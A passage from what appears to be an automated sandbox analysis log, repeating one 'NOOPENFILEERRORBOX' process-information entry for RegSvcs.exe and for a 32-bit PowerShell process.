Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
